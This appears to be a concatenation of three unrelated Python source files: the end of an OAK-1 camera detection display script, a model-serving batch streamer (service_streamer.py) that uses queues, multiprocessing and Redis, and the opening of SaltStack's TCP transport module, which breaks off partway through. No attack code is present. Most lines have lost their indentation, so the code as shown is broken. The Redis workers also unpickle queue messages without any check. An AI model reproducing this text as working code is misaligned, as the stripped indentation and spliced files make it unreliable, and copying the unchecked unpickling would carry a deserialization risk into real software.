cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "label: {}".format(self.goal_labels[bbox['label']], 1), (bbox['x_min'], bbox['y_min'] + 110),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.imshow("OAK-1 Edge", edgeFrame)
cv2.imshow("OAK-1", frame)
key = cv2.waitKey(1)
if key == ord("q"):
raise StopIteration()
def parse_object_frame(self, frame, bboxes):
frame, bboxes = super().parse_object_frame(frame, bboxes)
for bbox in bboxes:
cv2.putText(frame, "id: {}".format(bbox['id']), (bbox['x_min'], bbox['y_min'] + 30), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "status: {}".format(bbox['status']), (bbox['x_min'], bbox['y_min'] + 50), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.imshow("OAK-1 Objects", frame)
key = cv2.waitKey(1)
if key == ord("q"):
raise StopIteration()
if __name__ == '__main__':
log.info("Starting object-detection-host")
if args.debug:
MainDebug().run()
else:
Main().run()
|
service_streamer.py
|
# coding=utf-8
# Created by Meteorix at 2019/7/13
import logging
import multiprocessing
import os
import threading
import time
import uuid
import weakref
import pickle
from queue import Queue, Empty
from typing import List
from redis import Redis
from .managed_model import ManagedModel
TIMEOUT = 1
TIME_SLEEP = 0.001
WORKER_TIMEOUT = 20
logger = logging.getLogger(__name__)
logger.setLevel("INFO")
mp = multiprocessing.get_context("spawn")
class Future(object):
def __init__(self, task_id, task_size, future_cache_ref):
self._id = task_id
self._size = task_size
self._future_cache_ref = future_cache_ref
self._outputs = []
self._finish_event = threading.Event()
def result(self, timeout=None):
if self._size == 0:
self._finish_event.set()
return []
finished = self._finish_event.wait(timeout)
if not finished:
raise TimeoutError("Task: %d Timeout" % self._id)
# remove from future_cache
future_cache = self._future_cache_ref()
if future_cache is not None:
del future_cache[self._id]
# [(request_id, output), ...] sorted by request_id
self._outputs.sort(key=lambda i: i[0])
# restore batch result from outputs
batch_result = [i[1] for i in self._outputs]
return batch_result
    def done(self):
        return self._finish_event.is_set()
def _append_result(self, it_id, it_output):
self._outputs.append((it_id, it_output))
if len(self._outputs) >= self._size:
self._finish_event.set()
class _FutureCache(dict):
"Dict for weakref only"
pass
class _BaseStreamer(object):
def __init__(self, *args, **kwargs):
super().__init__()
self._client_id = str(uuid.uuid4())
self._task_id = 0
self._future_cache = _FutureCache() # {task_id: future}
self.back_thread = threading.Thread(target=self._loop_collect_result, name="thread_collect_result")
self.back_thread.daemon = True
def _delay_setup(self):
self.back_thread.start()
def _send_request(self, task_id, request_id, model_input):
raise NotImplementedError
def _recv_response(self, timeout=TIMEOUT):
raise NotImplementedError
def _input(self, batch: List) -> int:
"""
input a batch, distribute each item to mq, return task_id
"""
# task id in one client
task_id = self._task_id
self._task_id += 1
# request id in one task
request_id = 0
future = Future(task_id, len(batch), weakref.ref(self._future_cache))
self._future_cache[task_id] = future
for model_input in batch:
self._send_request(task_id, request_id, model_input)
request_id += 1
return task_id
def _loop_collect_result(self):
logger.info("start _loop_collect_result")
while True:
message = self._recv_response(timeout=TIMEOUT)
if message:
(task_id, request_id, item) = message
future = self._future_cache[task_id]
future._append_result(request_id, item)
            else:
                # no response arrived within the timeout; back off briefly before polling again
                time.sleep(TIME_SLEEP)
def _output(self, task_id: int) -> List:
future = self._future_cache[task_id]
batch_result = future.result(WORKER_TIMEOUT)
return batch_result
def submit(self, batch):
task_id = self._input(batch)
future = self._future_cache[task_id]
return future
def predict(self, batch):
task_id = self._input(batch)
ret = self._output(task_id)
return ret
class _BaseStreamWorker(object):
def __init__(self, predict_function, batch_size, max_latency, *args, **kwargs):
super().__init__()
assert callable(predict_function)
self._pid = os.getpid()
self._predict = predict_function
self._batch_size = batch_size
self._max_latency = max_latency
def run_forever(self):
self._pid = os.getpid() # overwrite the pid
logger.info("[gpu worker %d] %s start working" % (self._pid, self))
while True:
handled = self._run_once()
if not handled:
# sleep if no data handled last time
time.sleep(TIME_SLEEP)
def model_predict(self, batch_input):
batch_result = self._predict(batch_input)
return batch_result
def _run_once(self):
batch = []
start_time = time.time()
for i in range(self._batch_size):
try:
item = self._recv_request(timeout=self._max_latency)
except TimeoutError:
                # waiting for the next item exceeded the max latency
break
else:
batch.append(item)
if (time.time() - start_time) > self._max_latency:
# total batch time exceeds the max latency
break
if not batch:
return 0
model_inputs = [i[3] for i in batch]
model_outputs = self.model_predict(model_inputs)
        # send results back to the client (via queue or redis, depending on the worker)
for i, item in enumerate(batch):
client_id, task_id, request_id, _ = item
self._send_response(client_id, task_id, request_id, model_outputs[i])
batch_size = len(batch)
logger.info("[gpu worker %d] run_once batch_size: %d start_at: %s spend: %s" % (
self._pid, batch_size, start_time, time.time() - start_time))
return batch_size
def _recv_request(self, timeout=TIMEOUT):
raise NotImplementedError
def _send_response(self, client_id, task_id, request_id, model_input):
raise NotImplementedError
class ThreadedStreamer(_BaseStreamer):
def __init__(self, predict_function, batch_size, max_latency=0.1):
super().__init__()
self._input_queue = Queue()
self._output_queue = Queue()
self._worker = ThreadedWorker(predict_function, batch_size, max_latency, self._input_queue, self._output_queue)
self._worker_thread = threading.Thread(target=self._worker.run_forever, name="thread_worker")
self._worker_thread.daemon = True
self._worker_thread.start()
self._delay_setup()
def _send_request(self, task_id, request_id, model_input):
self._input_queue.put((0, task_id, request_id, model_input))
def _recv_response(self, timeout=TIMEOUT):
try:
message = self._output_queue.get(timeout=timeout)
except Empty:
message = None
return message
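# Illustrative usage sketch (not part of this module): wiring up a ThreadedStreamer
# around a hypothetical user-supplied `my_batch_predict`, a function that maps a list
# of inputs to a list of outputs of the same length. predict() blocks until the back
# thread has collected the whole batch result; submit() returns a Future instead.
def _example_threaded_streamer_usage(my_batch_predict):
    streamer = ThreadedStreamer(my_batch_predict, batch_size=64, max_latency=0.1)
    future = streamer.submit(["input_1"])                # non-blocking, returns a Future
    outputs = streamer.predict(["input_2", "input_3"])   # blocking convenience call
    return future.result(timeout=WORKER_TIMEOUT), outputs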
class ThreadedWorker(_BaseStreamWorker):
def __init__(self, predict_function, batch_size, max_latency, request_queue, response_queue):
super().__init__(predict_function, batch_size, max_latency)
self._request_queue = request_queue
self._response_queue = response_queue
def _recv_request(self, timeout=TIMEOUT):
try:
item = self._request_queue.get(timeout=timeout)
except Empty:
raise TimeoutError
else:
return item
def _send_response(self, client_id, task_id, request_id, model_output):
self._response_queue.put((task_id, request_id, model_output))
class Streamer(_BaseStreamer):
def __init__(self, predict_function_or_model, batch_size, max_latency=0.1, worker_num=1,
cuda_devices=None, model_init_args=None, model_init_kwargs=None):
super().__init__()
self.worker_num = worker_num
self.cuda_devices = cuda_devices
self._input_queue = mp.Queue()
self._output_queue = mp.Queue()
self._worker = StreamWorker(predict_function_or_model, batch_size, max_latency, self._input_queue,
self._output_queue, model_init_args, model_init_kwargs)
self._worker_ps = []
self._worker_ready_events = []
self._setup_gpu_worker()
self._delay_setup()
def _setup_gpu_worker(self):
for i in range(self.worker_num):
e = mp.Event()
if self.cuda_devices is not None:
gpu_id = self.cuda_devices[i % len(self.cuda_devices)]
args = (gpu_id, e,)
else:
args = (None, e,)
p = mp.Process(target=self._worker.run_forever, args=args, name="stream_worker", daemon=True)
p.start()
self._worker_ps.append(p)
self._worker_ready_events.append(e)
def _wait_for_worker_ready(self, timeout=WORKER_TIMEOUT):
        # wait for all workers to finish init
for (i, e) in enumerate(self._worker_ready_events):
# todo: select all events with timeout
is_ready = e.wait(timeout)
logger.info("gpu worker:%d ready state: %s" % (i, is_ready))
def _send_request(self, task_id, request_id, model_input):
self._input_queue.put((0, task_id, request_id, model_input))
def _recv_response(self, timeout=TIMEOUT):
try:
message = self._output_queue.get(timeout=timeout)
except Empty:
message = None
return message
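# Illustrative usage sketch (not part of this module): the multiprocess Streamer with a
# hypothetical ManagedModel subclass `MyManagedModel` (it must implement init_model()
# and predict()). Workers are spawned as separate processes, optionally pinned to GPUs.
def _example_multiprocess_streamer_usage(MyManagedModel):
    streamer = Streamer(MyManagedModel, batch_size=64, max_latency=0.1,
                        worker_num=2, cuda_devices=(0, 1))
    streamer._wait_for_worker_ready()  # block until every worker reports finished init
    return streamer.predict(["input_1", "input_2"])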
class StreamWorker(_BaseStreamWorker):
def __init__(self, predict_function_or_model, batch_size, max_latency, request_queue, response_queue,
model_init_args, model_init_kwargs):
super().__init__(predict_function_or_model, batch_size, max_latency)
self._request_queue = request_queue
self._response_queue = response_queue
self._model_init_args = model_init_args or []
self._model_init_kwargs = model_init_kwargs or {}
def run_forever(self, gpu_id=None, ready_event=None):
        # if it is a managed model, lazily init the model after fork & set CUDA_VISIBLE_DEVICES
if isinstance(self._predict, type) and issubclass(self._predict, ManagedModel):
model_class = self._predict
logger.info("[gpu worker %d] init model on gpu:%s" % (os.getpid(), gpu_id))
self._model = model_class(gpu_id)
self._model.init_model(*self._model_init_args, **self._model_init_kwargs)
logger.info("[gpu worker %d] init model on gpu:%s" % (os.getpid(), gpu_id))
self._predict = self._model.predict
if ready_event:
            ready_event.set()  # tell the parent process that init is finished
super().run_forever()
def _recv_request(self, timeout=TIMEOUT):
try:
item = self._request_queue.get(timeout=timeout)
except Empty:
raise TimeoutError
else:
return item
def _send_response(self, client_id, task_id, request_id, model_output):
self._response_queue.put((task_id, request_id, model_output))
class RedisStreamer(_BaseStreamer):
"""
    1. input a batch as a task
    2. distribute every single item in the batch to redis
    3. backend loop collects the results
    4. output the batch result for the task once every single item has returned
"""
def __init__(self, redis_broker="localhost:6379", prefix=''):
super().__init__()
self.prefix = prefix
self._redis_broker = redis_broker
self._redis = _RedisClient(self._client_id, self._redis_broker, self.prefix)
self._delay_setup()
def _send_request(self, task_id, request_id, model_input):
self._redis.send_request(task_id, request_id, model_input)
def _recv_response(self, timeout=TIMEOUT):
return self._redis.recv_response(timeout)
class RedisWorker(_BaseStreamWorker):
def __init__(self, model_class, batch_size, max_latency=0.1,
redis_broker="localhost:6379", prefix='', model_init_args=None, model_init_kwargs=None):
# assert issubclass(model_class, ManagedModel)
super().__init__(model_class, batch_size, max_latency)
self.prefix = prefix
self._model_init_args = model_init_args or []
self._model_init_kwargs = model_init_kwargs or {}
self._redis_broker = redis_broker
self._redis = _RedisServer(0, self._redis_broker, self.prefix)
self._requests_queue = Queue()
self.back_thread = threading.Thread(target=self._loop_recv_request, name="thread_recv_request")
self.back_thread.daemon = True
self.back_thread.start()
def run_forever(self, gpu_id=None):
logger.info("[gpu worker %d] init model on gpu:%s" % (os.getpid(), gpu_id))
model_class = self._predict
self._model = model_class(gpu_id)
self._model.init_model(*self._model_init_args, **self._model_init_kwargs)
self._predict = self._model.predict
super().run_forever()
def _loop_recv_request(self):
logger.info("[gpu worker %d] start loop_recv_request" % (os.getpid()))
while True:
message = self._redis.recv_request(timeout=TIMEOUT)
if message:
(client_id, task_id, request_id, request_item) = pickle.loads(message)
self._requests_queue.put((client_id, task_id, request_id, request_item))
else:
# sleep if recv timeout
time.sleep(TIME_SLEEP)
def _recv_request(self, timeout=TIMEOUT):
try:
item = self._requests_queue.get(timeout=timeout)
except Empty:
raise TimeoutError
else:
return item
def _send_response(self, client_id, task_id, request_id, model_output):
self._redis.send_response(client_id, task_id, request_id, model_output)
def _setup_redis_worker_and_runforever(model_class, batch_size, max_latency, gpu_id, redis_broker, prefix=''):
redis_worker = RedisWorker(model_class, batch_size, max_latency, redis_broker=redis_broker, prefix=prefix)
redis_worker.run_forever(gpu_id)
def run_redis_workers_forever(model_class, batch_size, max_latency=0.1,
worker_num=1, cuda_devices=None, redis_broker="localhost:6379",
prefix='', model_init_args=None, model_init_kwargs=None):
procs = []
for i in range(worker_num):
if cuda_devices is not None:
gpu_id = cuda_devices[i % len(cuda_devices)]
else:
gpu_id = None
args = [model_class, batch_size, max_latency, gpu_id, redis_broker, prefix]
p = mp.Process(target=_setup_redis_worker_and_runforever, args=args, name="stream_worker", daemon=True)
p.start()
procs.append(p)
for p in procs:
p.join()
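# Illustrative usage sketch (not part of this module): the redis-brokered setup splits
# the client and the GPU workers, possibly across machines. `MyManagedModel` and the
# broker address are hypothetical; both sides must agree on redis_broker and prefix.
def _example_redis_streamer_usage(MyManagedModel):
    # worker side (typically its own process or host); this call blocks forever:
    #   run_redis_workers_forever(MyManagedModel, batch_size=64, worker_num=2,
    #                             cuda_devices=(0, 1), redis_broker="localhost:6379")
    # client side:
    streamer = RedisStreamer(redis_broker="localhost:6379")
    return streamer.predict(["input_1", "input_2"])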
class _RedisAgent(object):
def __init__(self, redis_id, redis_broker='localhost:6379', prefix=''):
self._redis_id = redis_id
self._redis_host = redis_broker.split(":")[0]
self._redis_port = int(redis_broker.split(":")[1])
self._redis_request_queue_name = "request_queue" + prefix
self._redis_response_pb_prefix = "response_pb_" + prefix
self._redis = Redis(host=self._redis_host, port=self._redis_port)
self._response_pb = self._redis.pubsub(ignore_subscribe_messages=True)
self._setup()
def _setup(self):
raise NotImplementedError
def _response_pb_name(self, redis_id):
return self._redis_response_pb_prefix + redis_id
class _RedisClient(_RedisAgent):
def _setup(self):
self._response_pb.subscribe(self._response_pb_name(self._redis_id))
def send_request(self, task_id, request_id, model_input):
message = (self._redis_id, task_id, request_id, model_input)
self._redis.lpush(self._redis_request_queue_name, pickle.dumps(message))
def recv_response(self, timeout):
message = self._response_pb.get_message(timeout=timeout)
if message:
return pickle.loads(message["data"])
class _RedisServer(_RedisAgent):
def _setup(self):
# server subscribe all pubsub
self._response_pb.psubscribe(self._redis_response_pb_prefix + "*")
def recv_request(self, timeout):
message = self._redis.blpop(self._redis_request_queue_name, timeout=timeout)
# (queue_name, data)
if message:
return message[1]
def send_response(self, client_id, task_id, request_id, model_output):
message = (task_id, request_id, model_output)
channel_name = self._response_pb_name(client_id)
self._redis.publish(channel_name, pickle.dumps(message))
|
tcp.py
|
# -*- coding: utf-8 -*-
'''
TCP transport classes
Wire protocol: "len(payload) msgpack({'head': SOMEHEADER, 'body': SOMEBODY})"
'''
# Import Python Libs
from __future__ import absolute_import, print_function, unicode_literals
import errno
import logging
import msgpack
import socket
import os
import weakref
import time
import traceback
# Import Salt Libs
import salt.crypt
import salt.utils.asynchronous
import salt.utils.event
import salt.utils.files
import salt.utils.platform
import salt.utils.process
import salt.utils.verify
import salt.payload
import salt.exceptions
import salt.transport.frame
import salt.transport.ipc
import salt.transport.client
import salt.transport.server
import salt.transport.mixins.auth
from salt.ext import six
from salt.ext.six.moves import queue # pylint: disable=import-error
from salt.exceptions import SaltReqTimeoutError, SaltClientError
from salt.transport import iter_transport_opts
# Import Tornado Libs
import tornado
import tornado.tcpserver
import tornado.gen
import tornado.concurrent
import tornado.tcpclient
import tornado.netutil
# pylint: disable=import-error,no-name-in-module
if six.PY2:
import urlparse
else:
import urllib.parse as urlparse
# pylint: enable=import-error,no-name-in-module
# Import third party libs
try:
from M2Crypto import RSA
HAS_M2 = True
except ImportError:
HAS_M2 = False
try:
from Cryptodome.Cipher import PKCS1_OAEP
except ImportError:
from Crypto.Cipher import PKCS1_OAEP
if six.PY3 and salt.utils.platform.is_windows():
USE_LOAD_BALANCER = True
else:
USE_LOAD_BALANCER = False
if USE_LOAD_BALANCER:
import threading
import multiprocessing
import tornado.util
from salt.utils.process import SignalHandlingMultiprocessingProcess
log = logging.getLogger(__name__)
def _set_tcp_keepalive(sock, opts):
'''
Ensure that TCP keepalives are set for the socket.
'''
if hasattr(socket, 'SO_KEEPALIVE'):
if opts.get('tcp_keepalive', False):
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
if hasattr(socket, 'SOL_TCP'):
if hasattr(socket, 'TCP_KEEPIDLE'):
tcp_keepalive_idle = opts.get('tcp_keepalive_idle', -1)
if tcp_keepalive_idle > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPIDLE,
int(tcp_keepalive_idle))
if hasattr(socket, 'TCP_KEEPCNT'):
tcp_keepalive_cnt = opts.get('tcp_keepalive_cnt', -1)
if tcp_keepalive_cnt > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPCNT,
int(tcp_keepalive_cnt))
if hasattr(socket, 'TCP_KEEPINTVL'):
tcp_keepalive_intvl = opts.get('tcp_keepalive_intvl', -1)
if tcp_keepalive_intvl > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPINTVL,
int(tcp_keepalive_intvl))
if hasattr(socket, 'SIO_KEEPALIVE_VALS'):
# Windows doesn't support TCP_KEEPIDLE, TCP_KEEPCNT, nor
# TCP_KEEPINTVL. Instead, it has its own proprietary
# SIO_KEEPALIVE_VALS.
tcp_keepalive_idle = opts.get('tcp_keepalive_idle', -1)
tcp_keepalive_intvl = opts.get('tcp_keepalive_intvl', -1)
# Windows doesn't support changing something equivalent to
# TCP_KEEPCNT.
if tcp_keepalive_idle > 0 or tcp_keepalive_intvl > 0:
# Windows defaults may be found by using the link below.
# Search for 'KeepAliveTime' and 'KeepAliveInterval'.
# https://technet.microsoft.com/en-us/library/bb726981.aspx#EDAA
# If one value is set and the other isn't, we still need
# to send both values to SIO_KEEPALIVE_VALS and they both
# need to be valid. So in that case, use the Windows
# default.
if tcp_keepalive_idle <= 0:
tcp_keepalive_idle = 7200
if tcp_keepalive_intvl <= 0:
tcp_keepalive_intvl = 1
# The values expected are in milliseconds, so multiply by
# 1000.
sock.ioctl(socket.SIO_KEEPALIVE_VALS, (
1, int(tcp_keepalive_idle * 1000),
int(tcp_keepalive_intvl * 1000)))
else:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 0)
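# Illustrative sketch (not part of Salt): the opts keys read by _set_tcp_keepalive(),
# applied to a plain socket. The numeric values below are hypothetical examples.
def _example_set_tcp_keepalive():
    example_opts = {
        'tcp_keepalive': True,        # master switch for SO_KEEPALIVE
        'tcp_keepalive_idle': 300,    # seconds of idle time before the first probe
        'tcp_keepalive_cnt': 3,       # failed probes before the connection is dropped
        'tcp_keepalive_intvl': 60,    # seconds between probes
    }
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    _set_tcp_keepalive(sock, example_opts)
    return sock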
if USE_LOAD_BALANCER:
class LoadBalancerServer(SignalHandlingMultiprocessingProcess):
'''
Raw TCP server which runs in its own process and will listen
for incoming connections. Each incoming connection will be
sent via multiprocessing queue to the workers.
Since the queue is shared amongst workers, only one worker will
handle a given connection.
'''
# TODO: opts!
# Based on default used in tornado.netutil.bind_sockets()
backlog = 128
def __init__(self, opts, socket_queue, **kwargs):
super(LoadBalancerServer, self).__init__(**kwargs)
self.opts = opts
self.socket_queue = socket_queue
self._socket = None
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on
# Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['opts'],
state['socket_queue'],
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
def __getstate__(self):
return {
'opts': self.opts,
'socket_queue': self.socket_queue,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def close(self):
if self._socket is not None:
self._socket.shutdown(socket.SHUT_RDWR)
self._socket.close()
self._socket = None
def __del__(self):
self.close()
def run(self):
'''
Start the load balancer
'''
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(1)
self._socket.bind((self.opts['interface'], int(self.opts['ret_port'])))
self._socket.listen(self.backlog)
while True:
try:
# Wait for a connection to occur since the socket is
# blocking.
connection, address = self._socket.accept()
# Wait for a free slot to be available to put
# the connection into.
# Sockets are picklable on Windows in Python 3.
self.socket_queue.put((connection, address), True, None)
except socket.error as e:
# ECONNABORTED indicates that there was a connection
# but it was closed while still in the accept queue.
# (observed on FreeBSD).
if tornado.util.errno_from_exception(e) == errno.ECONNABORTED:
continue
raise
# TODO: move serial down into message library
class AsyncTCPReqChannel(salt.transport.client.ReqChannel):
'''
Encapsulate sending routines to tcp.
Note: this class returns a singleton
'''
# This class is only a singleton per minion/master pair
# mapping of io_loop -> {key -> channel}
instance_map = weakref.WeakKeyDictionary()
def __new__(cls, opts, **kwargs):
'''
Only create one instance of channel per __key()
'''
# do we have any mapping for this io_loop
io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
if io_loop not in cls.instance_map:
cls.instance_map[io_loop] = weakref.WeakValueDictionary()
loop_instance_map = cls.instance_map[io_loop]
key = cls.__key(opts, **kwargs)
obj = loop_instance_map.get(key)
if obj is None:
log.debug('Initializing new AsyncTCPReqChannel for %s', key)
            # we need a local variable for this, as we are going to store it in a
            # WeakValueDictionary, which drops the item once nothing references it;
            # the local reference keeps the object alive while we return it to the caller
obj = object.__new__(cls)
obj.__singleton_init__(opts, **kwargs)
loop_instance_map[key] = obj
else:
log.debug('Re-using AsyncTCPReqChannel for %s', key)
return obj
@classmethod
def __key(cls, opts, **kwargs):
if 'master_uri' in kwargs:
opts['master_uri'] = kwargs['master_uri']
return (opts['pki_dir'], # where the keys are stored
opts['id'], # minion ID
opts['master_uri'],
kwargs.get('crypt', 'aes'), # TODO: use the same channel for crypt
)
# has to remain empty for singletons, since __init__ will *always* be called
def __init__(self, opts, **kwargs):
pass
# an init for the singleton instance to call
def __singleton_init__(self, opts, **kwargs):
self.opts = dict(opts)
self.serial = salt.payload.Serial(self.opts)
# crypt defaults to 'aes'
self.crypt = kwargs.get('crypt', 'aes')
self.io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
if self.crypt != 'clear':
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
resolver = kwargs.get('resolver')
parse = urlparse.urlparse(self.opts['master_uri'])
master_host, master_port = parse.netloc.rsplit(':', 1)
self.master_addr = (master_host, int(master_port))
self._closing = False
self.message_client = SaltMessageClientPool(self.opts,
args=(self.opts, master_host, int(master_port),),
kwargs={'io_loop': self.io_loop, 'resolver': resolver,
'source_ip': self.opts.get('source_ip'),
'source_port': self.opts.get('source_ret_port')})
def close(self):
if self._closing:
return
self._closing = True
self.message_client.close()
def __del__(self):
self.close()
def _package_load(self, load):
return {
'enc': self.crypt,
'load': load,
}
@tornado.gen.coroutine
def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60):
if not self.auth.authenticated:
yield self.auth.authenticate()
ret = yield self.message_client.send(self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout)
key = self.auth.get_keys()
if HAS_M2:
aes = key.private_decrypt(ret['key'], RSA.pkcs1_oaep_padding)
else:
cipher = PKCS1_OAEP.new(key)
aes = cipher.decrypt(ret['key'])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
data = pcrypt.loads(ret[dictkey])
if six.PY3:
data = salt.transport.frame.decode_embedded_strs(data)
raise tornado.gen.Return(data)
@tornado.gen.coroutine
def _crypted_transfer(self, load, tries=3, timeout=60):
'''
In case of authentication errors, try to renegotiate authentication
and retry the method.
Indeed, we can fail too early in case of a master restart during a
minion state execution call
'''
@tornado.gen.coroutine
def _do_transfer():
data = yield self.message_client.send(self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
)
            # we may not always have data; for example, a salt-call ret submission
            # is a blind communication: we do not subscribe to return events, we
            # just upload the results to the master
if data:
data = self.auth.crypticle.loads(data)
if six.PY3:
data = salt.transport.frame.decode_embedded_strs(data)
raise tornado.gen.Return(data)
if not self.auth.authenticated:
yield self.auth.authenticate()
try:
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
except salt.crypt.AuthenticationError:
yield self.auth.authenticate()
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
ret = yield self.message_client.send(self._package_load(load), timeout=timeout)
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def send(self, load, tries=3, timeout=60, raw=False):
'''
Send a request, return a future which will complete when we send the message
'''
try:
if self.crypt == 'clear':
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout)
except tornado.iostream.StreamClosedError:
# Convert to 'SaltClientError' so that clients can handle this
# exception more appropriately.
raise SaltClientError('Connection to master lost')
raise tornado.gen.Return(ret)
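# Illustrative sketch (not part of Salt) of the singleton behaviour documented above:
# constructing the channel twice on the same io_loop with the same opts yields the same
# object, because instances are keyed on (pki_dir, id, master_uri, crypt).
# `example_minion_opts` is a hypothetical, fully populated minion opts dict.
def _example_req_channel_is_singleton(example_minion_opts):
    a = AsyncTCPReqChannel(example_minion_opts, crypt='aes')
    b = AsyncTCPReqChannel(example_minion_opts, crypt='aes')
    assert a is b
    return a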
class AsyncTCPPubChannel(salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel):
def __init__(self,
opts,
**kwargs):
self.opts = opts
self.serial = salt.payload.Serial(self.opts)
self.crypt = kwargs.get('crypt', 'aes')
self.io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
self.connected = False
self._closing = False
self._reconnected = False
self.event = salt.utils.event.get_event(
'minion',
opts=self.opts,
listen=False
)
def close(self):
if self._closing:
return
self._closing = True
if hasattr(self, 'message_client'):
self.message_client.close()
def __del__(self):
self.close()
def _package_load(self, load):
return {
'enc': self.crypt,
'load': load,
}
@tornado.gen.coroutine
def send_id(self, tok, force_auth):
'''
Send the minion id to the master so that the master may better
track the connection state of the minion.
In case of authentication errors, try to renegotiate authentication
and retry the method.
'''
load = {'id': self.opts['id'], 'tok': tok}
@tornado.gen.coroutine
def _do_transfer():
msg = self._package_load(self.auth.crypticle.dumps(load))
package = salt.transport.frame.frame_msg(msg, header=None)
yield self.message_client.write_to_stream(package)
raise tornado.gen.Return(True)
if force_auth or not self.auth.authenticated:
count = 0
while count <= self.opts['tcp_authentication_retries'] or self.opts['tcp_authentication_retries'] < 0:
try:
yield self.auth.authenticate()
break
except SaltClientError as exc:
log.debug(exc)
count += 1
try:
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
except salt.crypt.AuthenticationError:
yield self.auth.authenticate()
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def connect_callback(self, result):
if self._closing:
return
# Force re-auth on reconnect since the master
# may have been restarted
yield self.send_id(self.tok, self._reconnected)
self.connected = True
self.event.fire_event(
{'master': self.opts['master']},
'__master_connected'
)
if self._reconnected:
# On reconnects, fire a master event to notify that the minion is
# available.
if self.opts.get('__role') == 'syndic':
data = 'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
)
tag = salt.utils.event.tagify(
[self.opts['id'], 'start'],
'syndic'
)
else:
data = 'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
)
tag = salt.utils.event.tagify(
[self.opts['id'], 'start'],
'minion'
)
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': None,
'tok': self.tok,
'data': data,
'tag': tag}
req_channel = salt.utils.asynchronous.SyncWrapper(
AsyncTCPReqChannel, (self.opts,)
)
try:
req_channel.send(load, timeout=60)
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
except Exception:
log.info('fire_master failed: %s', traceback.format_exc())
else:
self._reconnected = True
def disconnect_callback(self):
if self._closing:
return
self.connected = False
self.event.fire_event(
{'master': self.opts['master']},
'__master_disconnected'
)
@tornado.gen.coroutine
def connect(self):
try:
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.tok = self.auth.gen_token(b'salt')
if not self.auth.authenticated:
yield self.auth.authenticate()
if self.auth.authenticated:
self.message_client = SaltMessageClientPool(
self.opts,
args=(self.opts, self.opts['master_ip'], int(self.auth.creds['publish_port']),),
kwargs={'io_loop': self.io_loop,
'connect_callback': self.connect_callback,
'disconnect_callback': self.disconnect_callback,
'source_ip': self.opts.get('source_ip'),
'source_port': self.opts.get('source_publish_port')})
yield self.message_client.connect() # wait for the client to be connected
self.connected = True
# TODO: better exception handling...
except KeyboardInterrupt:
raise
except Exception as exc:
if '-|RETRY|-' not in six.text_type(exc):
raise SaltClientError('Unable to sign_in to master: {0}'.format(exc)) # TODO: better error message
def on_recv(self, callback):
'''
Register an on_recv callback
'''
if callback is None:
return self.message_client.on_recv(callback)
@tornado.gen.coroutine
def wrap_callback(body):
if not isinstance(body, dict):
# TODO: For some reason we need to decode here for things
# to work. Fix this.
body = msgpack.loads(body)
if six.PY3:
body = salt.transport.frame.decode_embedded_strs(body)
ret = yield self._decode_payload(body)
callback(ret)
return self.message_client.on_recv(wrap_callback)
class TCPReqServerChannel(salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel):
# TODO: opts!
backlog = 5
def __init__(self, opts):
salt.transport.server.ReqServerChannel.__init__(self, opts)
self._socket = None
@property
def socket(self):
return self._socket
def close(self):
if self._socket is not None:
try:
self._socket.shutdown(socket.SHUT_RDWR)
except socket.error as exc:
if exc.errno == errno.ENOTCONN:
# We may try to shutdown a socket which is already disconnected.
# Ignore this condition and continue.
pass
else:
raise exc
self._socket.close()
self._socket = None
if hasattr(self.req_server, 'stop'):
try:
self.req_server.stop()
except Exception as exc:
log.exception('TCPReqServerChannel close generated an exception: %s', str(exc))
def __del__(self):
self.close()
def pre_fork(self, process_manager):
'''
Pre-fork we need to create the zmq router device
'''
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
if USE_LOAD_BALANCER:
self.socket_queue = multiprocessing.Queue()
process_manager.add_process(
LoadBalancerServer, args=(self.opts, self.socket_queue)
)
elif not salt.utils.platform.is_windows():
